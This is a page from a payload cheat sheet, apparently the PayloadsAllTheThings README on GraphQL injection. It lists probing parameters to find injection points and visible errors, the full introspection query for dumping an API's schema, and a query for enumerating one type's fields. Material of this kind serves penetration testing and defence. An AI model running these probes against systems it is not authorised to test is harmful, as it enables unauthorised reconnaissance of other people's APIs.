PayloadsAllTheThings/GraphQL Injection
2019-03-07 00:07:55 +01:00
..
README.md Fix name's capitalization 2019-03-07 00:07:55 +01:00

GraphQL injection

GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.

Exploit

Identify an injection point

?param={__schema{types{name}}}

Check if errors are visible

?param={__schema}
?param={}
?param={thisdefinitelydoesnotexist}

Enumerate Database Schema with the following GraphQL query

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type

{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}

References